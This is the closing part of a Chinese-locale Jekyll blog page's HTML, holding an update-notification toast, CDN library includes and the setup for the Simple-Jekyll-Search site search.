  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">发现新版本的内容。</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      更新
    </button>
  </div>
</aside>

    

    <!-- JavaScripts -->

    <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.7.1/dist/jquery.min.js,npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js,npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.10/dayjs.min.js,npm/dayjs@1.11.10/locale/zh.min.js,npm/dayjs@1.11.10/plugin/relativeTime.min.js,npm/dayjs@1.11.10/plugin/localizedFormat.min.js,npm/tocbot@4.21.2/dist/tocbot.min.js"></script>






<script defer src="/assets/js/dist/post.min.js"></script>






    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  /* Note: dependent library will be loaded in `js-selector.html` */
  SimpleJekyllSearch({
    searchInput: document.getElementById('search-input'),
    resultsContainer: document.getElementById('search-results'),
    json: '/assets/js/data/search.json',
    searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
    noResultsText: '<p class="mt-5"></p>',
    templateMiddleware: function(prop, value, template) {
      if (prop === 'categories') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
        }
      }

      if (prop === 'tags') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
        }
      }
    }
  });
</script>

  </body>
</html>

